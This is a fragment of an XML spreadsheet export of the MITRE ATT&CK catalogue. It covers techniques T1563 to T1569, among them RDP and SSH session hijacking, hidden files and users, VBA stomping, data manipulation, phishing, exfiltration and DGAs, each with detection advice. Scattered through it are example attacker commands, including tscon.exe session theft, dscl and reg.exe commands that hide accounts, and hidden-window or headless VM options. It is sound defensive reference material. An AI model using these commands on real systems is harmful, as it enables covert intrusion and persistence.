    <t>Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: &lt;code&gt;powershell –v 2&lt;/code&gt;). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.</t>
  </si>
  <si>
    <t>Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.
Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions.</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: SSH Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is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Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>SSH service enabled, trust relationships configured, established connections</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: RDP Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/002</t>
  </si>
  <si>
    <t>Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>26 February 2020</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</t>
  </si>
  <si>
    <t>Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Files and Directories</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</si>
  <si>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(&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls –a&lt;/code&gt; for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/001</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Users</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.
In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt;) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)
In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: &lt;code&gt;reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f&lt;/code&gt;.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, "hidden" users may still get a home directory and will appear in the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t>
  </si>
  <si>
    <t>Omkar Gudhate</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Window</t>
  </si>
  <si>
    <t>Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/003</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</si>
  <si>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</si>
  <si>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Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Hide Artifacts: NTFS File Attributes</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/004</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe; Red Canary</t>
  </si>
  <si>
    <t>NTFS partitioned hard drive</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden File System</t>
  </si>
  <si>
    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>28 June 2020</t>
  </si>
  <si>
    <t>29 June 2020</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.</t>
  </si>
  <si>
    <t>Hide Artifacts: Run Virtual Instance</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.
Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. &lt;code&gt;-silent&lt;/code&gt;, &lt;code&gt;-ignore-reboot&lt;/code&gt;), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. &lt;code&gt;VBoxManage startvm $VM --type headless&lt;/code&gt;).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. &lt;code&gt;VBoxManage.exe setextradata global GUI/SuppressMessages "all"&lt;/code&gt;).
Monitor for commands which enable hypervisors such as Hyper-V.  If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. 
Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.</t>
  </si>
  <si>
    <t>Janantha Marasinghe; Johann Rehberger; Menachem Shafran, XM Cyber</t>
  </si>
  <si>
    <t>Hide Artifacts: VBA Stomping</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/007</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</t>
  </si>
  <si>
    <t>Rick Cole, Mandiant</t>
  </si>
  <si>
    <t>MS Office version specified in &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream must match host</t>
  </si>
  <si>
    <t>Hide Artifacts: Email Hiding Rules</t>
  </si>
  <si>
    <t>Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the &lt;code&gt;New-InboxRule&lt;/code&gt; or &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as &lt;code&gt;malware&lt;/code&gt;, &lt;code&gt;suspicious&lt;/code&gt;, &lt;code&gt;phish&lt;/code&gt;, and &lt;code&gt;hack&lt;/code&gt;) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.
On Windows systems, monitor for creation of suspicious inbox rules through the use of the &lt;code&gt;New-InboxRule&lt;/code&gt; and &lt;code&gt;Set-InboxRule&lt;/code&gt; PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the &lt;code&gt;RulesActiveState.plist&lt;/code&gt;, &lt;code&gt;SyncedRules.plist&lt;/code&gt;, &lt;code&gt;UnsyncedRules.plist&lt;/code&gt;, and &lt;code&gt;MessageRules.plist&lt;/code&gt; files.(Citation: MacOS Email Rules)</t>
  </si>
  <si>
    <t>Dor Edry, Microsoft</t>
  </si>
  <si>
    <t>Hide Artifacts: Resource Forking</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</si>
  <si>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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/009</t>
  </si>
  <si>
    <t xml:space="preserve">Identify files with the &lt;code&gt;com.apple.ResourceFork&lt;/code&gt; extended attribute and large data amounts stored in resource forks. 
Monitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. </t>
  </si>
  <si>
    <t>Ivan Sinyakov; Jaron Bradley @jbradley89</t>
  </si>
  <si>
    <t>Notarization; Gatekeeper</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity.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</si>
  <si>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https://attack.mitre.org/techniques/T1565</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>Data Manipulation: Stored Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data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</si>
  <si>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https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Data Manipulation: Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: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</si>
  <si>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https://attack.mitre.org/techniques/T1565/002</t>
  </si>
  <si>
    <t xml:space="preserve">Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. </t>
  </si>
  <si>
    <t>Data Manipulation: Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect.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</si>
  <si>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https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect 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URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because most common third-party services used for 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Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Philip Winther</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Attachment</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/001</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</si>
  <si>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</si>
  <si>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Phishing: Spearphishing Link</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</si>
  <si>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or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/002</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Philip Winther; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>Phishing: Spearphishing via Service</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/003</t>
  </si>
  <si>
    <t>18 October 2020</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</si>
  <si>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</si>
  <si>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
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567</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</si>
  <si>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</si>
  <si>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Exfiltration Over Web Service: Exfiltration to Code Repository</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1567/002</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</si>
  <si>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</si>
  <si>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
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>10 March 2020</t>
  </si>
  <si>
    <t>02 October 2020</t>
  </si>
  <si>
    <t>Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to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algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.</t>
  </si>
  <si>
    <t>Chris Roffe</t>
  </si>
  <si>
    <t>Dynamic Resolution: Fast Flux DNS</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <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</si>
  <si>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Dynamic Resolution: Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/002</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</si>
  <si>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</si>
  <si>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Barry Shteiman, Exabeam; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>Dynamic Resolution: DNS Calculation</t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</t>
  </si>
  <si>
    <t>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Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569</t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.</t>
  </si>
  <si>
    <t>System Services: Launchctl</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
